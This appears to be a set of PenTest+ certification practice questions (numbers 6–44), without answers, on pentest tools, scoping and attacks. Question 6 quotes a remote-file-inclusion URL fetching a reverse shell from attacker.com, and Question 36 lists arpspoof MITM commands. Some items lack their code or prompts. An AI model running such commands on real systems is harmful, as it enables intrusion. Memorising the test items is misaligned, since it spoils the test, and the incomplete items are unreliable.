
PT0-001 Questions and Answers

Question # 6

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?

A.

Implement a blacklist.

B.

Block URL redirections.

C.

Double URL encode the parameters.

D.

Stop external calls from the application.

Question # 7

Which of the following tools is used to perform a credential brute force attack?

A.

Hydra

B.

John the Ripper

C.

Hashcat

D.

Peach

Question # 8

An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment. During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack. Which of the following actions should the penetration tester take?

A.

Attempt to use the remnant tools to achieve persistence

B.

Document the presence of the left-behind tools in the report and proceed with the test

C.

Remove the tools from the affected systems before continuing on with the test

D.

Discontinue further testing and report the situation to management

Question # 9

A penetration tester is required to exploit a WPS implementation weakness. Which of the following tools will perform the attack?

A.

Karma

B.

Kismet

C.

Pixie

D.

NetStumbler

Question # 10

A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication. Which of the following attacks is MOST likely to succeed in creating a physical effect?

A.

DNS cache poisoning

B.

Record and replay

C.

Supervisory server SMB

D.

Blind SQL injection

Question # 11

Performance based

You are a penetration tester reviewing a client's website through a web browser.

Instructions:

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate source or cookies.

Question # 12

A penetration testing company was hired to conduct a penetration test against Company A's network of 20.10.10.0/24 and mail.companyA.com. While the penetration testing company was in the information gathering phase, it was discovered that the mail.companyA.com IP address resolved to 20.15.1.2 and belonged to Company B. Which of the following would be the BEST solution to conduct penetration testing against mail.companyA.com?

A.

The penetration tester should conduct penetration testing against mail.companyA.com because the domain name is in scope.

B.

The penetration tester should ask Company A for a signed statement giving permission to conduct a test against mail.companyA.com.

C.

The penetration tester should ignore mail.companyA.com testing and complete only the network range 20.10.10.0/24.

D.

The penetration tester should only use passive open source intelligence gathering methods leveraging publicly available information to analyze mail.companyA.com.

Question # 13

An Internet-accessible database server was found with the following ports open: 22, 53, 110, 1433, and 3389. Which of the following would be the BEST hardening technique to secure the server?

A.

Ensure all protocols are using encryption.

B.

Employ network ACLs.

C.

Disable source routing on the server.

D.

Ensure the IDS rules have been updated.

Question # 14

A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

A.

TCP SYN flood

B.

SQL injection

C.

XSS

D.

XMAS scan

Question # 15

After establishing a shell on a target system, Joe, a penetration tester, is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?

A.

Run a zero-day exploit.

B.

Create a new domain user with a known password.

C.

Modify a known boot time service to instantiate a call back.

D.

Obtain cleartext credentials of the compromised user.

Question # 16

Which of the following wordlists is BEST for cracking MD5 password hashes of an application's users from a compromised database?

A.

./wordlists/rockyou.txt

B.

./dirb/wordlists/big.txt

C.

./wfuzz/wordlist/vulns/sql_inj.txt

D.

./wordlists/metasploit/root_userpass.txt

Question # 17

Defining exactly what is to be tested and the results to be generated from the test will help prevent which of the following?

A.

testing scope creep

B.

scheduling conflicts

C.

impact on production

D.

disclosure of information.

Question # 18

A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?

A.

The physical location and network ESSIDs to be tested

B.

The number of wireless devices owned by the client

C.

The client's preferred wireless access point vendor

D.

The bands and frequencies used by the client's devices

Question # 19

A penetration tester wants to target the NetBIOS name service. Which of the following is the most likely command to exploit the NetBIOS name service?

A.

arpspoof

B.

nmap

C.

responder

D.

burpsuite

Question # 20

A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

A.

Download the GHOST file to a Linux system and compile

gcc -o GHOST

test it:

./GHOST

B.

Download the GHOST file to a Windows system and compile

gcc -o GHOST GHOST.c

test it:

./GHOST

C.

Download the GHOST file to a Linux system and compile

gcc -o GHOST GHOST.c

test it:

./GHOST

D.

Download the GHOST file to a Windows system and compile

gcc -o GHOST

test it:

./GHOST

Question # 21

An individual has been hired by an organization after passing a background check. The individual has been passing information to a competitor over a period of time. Which of the following classifications BEST describes the individual?

A.

APT

B.

Insider threat

C.

Script kiddie

D.

Hacktivist

Question # 22

A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?

A.

Nikto

B.

WAR

C.

W3AF

D.

Swagger

Question # 23

A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of the following is the BEST method for a tester to confirm the vulnerability exists?

A.

Manually run publicly available exploit code.

B.

Confirm via evidence of the updated version number.

C.

Run the vulnerability scanner again.

D.

Perform dynamic analysis on the vulnerable service.

Question # 24

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the code and output below:

    import requests
    from BeautifulSoup import BeautifulSoup

    request = requests.get("https://www.bank.com/admin")
    respHeader, respBody = request[0], request[1]

    if respHeader.StatusCode == 200:
        soup = BeautifulSoup(respBody)
        soup = soup.findAll("div", {"type": "hidden"})
        print respHeader.StatusCode, respHeader.StatusMessage
    else:
        print respHeader.StatusCode, respHeader.StatusMessage

Output: 200 OK

Which of the following is the tester intending to do?

A.

Horizontally escalate privileges

B.

Scrape the page for hidden fields

C.

Analyze HTTP response code

D.

Search for HTTP headers

Question # 25

Which of the following should a penetration tester verify prior to testing the login and permissions management for a web application that is protected by a CDN-based WAF?

A.

If an NDA is signed with the CDN company

B.

If the SSL certificates for the web application are valid

C.

If a list of the applicable WAF rules was obtained

D.

If the IP addresses for the penetration tester are whitelisted on the WAF

Question # 26

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

A.

ICS vendors are slow to implement adequate security controls.

B.

ICS staff are not adequately trained to perform basic duties.

C.

There is a scarcity of replacement equipment for critical devices.

D.

There is a lack of compliance for ICS facilities.

Question # 27

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?

A.

Manufacturers developing IoT devices are less concerned with security.

B.

It is difficult for administrators to implement the same security standards across the board.

C.

IoT systems often lack the hardware power required by more secure solutions.

D.

Regulatory authorities often have lower security requirements for IoT systems.

Question # 28

Which of the following BEST protects against a rainbow table attack?

A.

Increased password complexity

B.

Symmetric encryption

C.

Cryptographic salting

D.

Hardened OS configurations

Question # 29

During a penetration test, a host is discovered that appears to have been previously compromised and has an active outbound connection. After verifying the network activity is malicious, which of the following should the tester do?

A.

Inform the client to shut it down and investigate.

B.

Take action and shut it down immediately.

C.

Inform the client and allow them to respond.

D.

Note the finding and continue the assessment.

Question # 30

A penetration tester used an ASP.NET web shell to gain access to a web application, which allowed the tester to pivot in the corporate network. Which of the following is the MOST important follow-up activity to complete after the tester delivers the report?

A.

Removing shells

B.

Obtaining client acceptance

C.

Removing tester-created credentials

D.

Documenting lessons learned

E.

Presenting attestation of findings

Question # 31

A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake. Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?

A.

Subject key identifier

B.

Subject alternative name

C.

Authority information access

D.

Service principal name

Question # 32

A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?

A.

Attempt to crack the service account passwords.

B.

Attempt DLL hijacking attacks.

C.

Attempt to locate weak file and folder permissions.

D.

Attempt privilege escalation attacks.

Question # 33

A manager calls upon a tester to assist with diagnosing an issue within the following Python script:

    #!/usr/bin/python
    s = "Administrator"

The tester suspects it is an issue with string slicing and manipulation. Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment. Options may be used once or not at all.

Question # 34

When performing active information reconnaissance, which of the following should be tested FIRST before starting the exploitation process?

A.

SQLmap

B.

TLS configuration

C.

HTTP verbs

D.

Input fields

Question # 35

A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

A.

Wait outside of the company’s building and attempt to tailgate behind an employee.

B.

Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access.

C.

Use domain and IP registry websites to identify the company’s external netblocks and external facing applications.

D.

Search social media for information technology employees who post information about the technologies they work with.

E.

Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access.

Question # 36

A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:

IP: 192.168.1.20

NETMASK: 255.255.255.0

DEFAULT GATEWAY: 192.168.1.254

DHCP: 192.168.1.253

DNS: 192.168.10.10, 192.168.20.10

Which of the following commands should the malicious user execute to perform the MITM attack?

A.

arpspoof -c both -r -t 192.168.1.1 192.168.1.20

B.

arpspoof -t 192.168.1.20 192.168.1.254

C.

arpspoof -c both -t 192.168.1.20 192.168.1.253

D.

arpspoof -r -t 192.168.1.253 192.168.1.20

Question # 37

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

A.

Shodan

B.

SET

C.

BeEF

D.

Wireshark

E.

Maltego

F.

Dynamo

Question # 38

While presenting the results of a penetration test to a client's executive team, the Chief Information Security Officer (CISO) asks for remediation advice for a shared local administrator finding. The client is geographically dispersed, and centralized management is a key concern. Which of the following is the BEST remediation to suggest?

A.

Have random and unique credentials per system.

B.

Disable the administrator login from the network.

C.

Use a service account for administrative functions.

D.

Implement a single rotating password for systems.

Question # 39

A penetration tester is performing a code review against a web application. Given the following URL and source code:

Which of the following vulnerabilities is present in the code above?

A.

SQL injection

B.

Cross-site scripting

C.

Command injection

D.

LDAP injection

Question # 40

Which of the following documents BEST describes the manner in which a security assessment will be conducted?

A.

BIA

B.

SOW

C.

SLA

D.

MSA

Question # 41

Which of the following are MOST important when planning for an engagement? (Select TWO).

A.

Goals/objectives

B.

Architectural diagrams

C.

Tolerance to impact

D.

Storage time for a report

E.

Company policies

Question # 42

A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovering vulnerabilities, the company asked the consultant to perform the following tasks:

  • Code review
  • Updates to firewall settings

Which of the following has occurred in this situation?

A.

Scope creep

B.

Post-mortem review

C.

Risk acceptance

D.

Threat prevention

Question # 43

If a security consultant comes across a password hash that resembles the following:

b117525b345470c29ca3dBae0b556ba8

Which of the following formats is the correct hash type?

A.

Kerberos

B.

NetNTLMv1

C.

NTLM

D.

SHA-1

Question # 44

Given the following HTTP response:

HTTP/1.0 200 OK

Server: Apache

Set-Cookie: AUTHID=879DHUT74D9A7C; http-only

Content-type: text/html

Connection: Close

Which of the following aspects of an XSS attack would be prevented?

A.

Client-side website defacement

B.

Session hijacking

C.

Cross-site request forgery

D.

JavaScript keylogging
